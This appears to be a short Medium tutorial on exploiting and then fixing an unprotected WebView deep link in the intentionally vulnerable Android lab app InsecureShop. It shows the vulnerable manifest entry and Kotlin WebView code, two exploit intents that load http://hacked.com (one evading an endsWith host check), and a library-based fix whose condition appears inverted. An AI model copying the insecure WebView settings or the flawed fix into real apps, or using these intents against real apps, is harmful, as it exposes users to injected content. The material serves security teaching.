Hacking & Securing “Insecure Shop” — Unprotected web views

Hacking

<activity android:name=".WebViewActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />

<data
android:host="com.insecureshop"
android:scheme="insecureshop" />
</intent-filter>
</activity>
val uri: Uri? = intent.datawebview.settings.javaScriptEnabled = true
webview.settings.loadWithOverviewMode = true
webview.settings.useWideViewPort = true
webview.settings.allowUniversalAccessFromFileURLs = true
webview.settings.userAgentString = USER_AGENT
if (uri.path.equals("/web")) {
data = intent.data?.getQueryParameter("url")
} else if (uri.path.equals("/webview")) {
if (intent.data!!.getQueryParameter("url")!!.endsWith("insecureshopapp.com")) {
data = intent.data?.getQueryParameter("url")
}
}
Intent("android.intent.action.VIEW")
.apply {
data = Uri.parse("insecureshop://com.insecureshop/web?url=http://hacked.com")
}
)
Intent("android.intent.action.VIEW")
.apply {
data = Uri.parse("insecureshop://com.insecureshop/webview?url=http://hacked.com?test=insecureshopapp.com")
}
)

Securing

implementation "io.github.dllewellyn.safetorun:inputverification:1.0.7"
intent.data?.getQueryParameter("url")
?.also {
if (it.urlVerification {
"insecureshopapp.com".allowHost()
}) {
throw IllegalArgumentException("Don't hack my app!!")
}
}

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Make a simple RecyclerView in Android with Kotlin

New and effective architecture in Android

Android WorkManager

Integrating Flutter Module in existing Android App

WhatsApp Clone — Jetpack Compose — Chats

Barcode Scanner App | Android Studio

Android Picture in picture mode and backstack management for multiple activities

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Daniel Llewellyn

Daniel Llewellyn

More from Medium

Journey to the first 2 CVEs

Intigriti’s January XSS challenge By TheRealBrenu

What is the OWASP Top 10? | rootissh

Facing Issues with Nuclei upgrade??